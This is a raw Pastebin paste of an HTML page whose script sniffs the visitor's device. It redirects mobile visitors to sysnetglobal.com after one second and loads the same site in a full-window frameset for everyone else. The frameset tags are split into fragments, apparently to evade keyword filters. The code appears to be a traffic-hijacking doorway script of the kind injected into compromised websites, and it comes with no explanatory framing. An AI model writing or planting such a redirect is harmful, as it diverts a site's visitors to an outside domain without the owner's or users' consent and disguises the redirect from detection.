Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <head>
- <script type='text/javascript'>
- function mobile_device_detect(url) {
- var houzhui = "";
- var thisOS = navigator.platform;
- var os = new Array("iPhone", "iPod", "iPad", "android", "Nokia", "SymbianOS", "Symbian", "Windows Phone", "Phone", "Linux armv71", "MAUI", "UNTRUSTED/1.0", "Windows CE", "BlackBerry", "IEMobile");
- for (var i = 0; i < os.length; i++) {
- if (thisOS.match(os[i])) {
- setTimeout(function() {
- window.location.href = url + houzhui
- }, 1000)
- }
- }
- if (navigator.platform.indexOf('iPad') != -1) {
- setTimeout(function() {
- window.location.href = url + houzhui
- }, 1000)
- }
- var check = navigator.appVersion;
- if (check.match(/linux/i)) {
- if (check.match(/mobile/i) || check.match(/X11/i)) {
- setTimeout(function() {
- window.location.href = url + houzhui
- }, 1000)
- }
- } else {
- document.writeln("<fram" + "eset cols=\"100%\"><fr" + "ame src=\"http://sysnetglobal.com/" + "\" /></fra" + "meset>")
- }
- }
- mobile_device_detect("http://sysnetglobal.com/");
- </script>
- </head>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment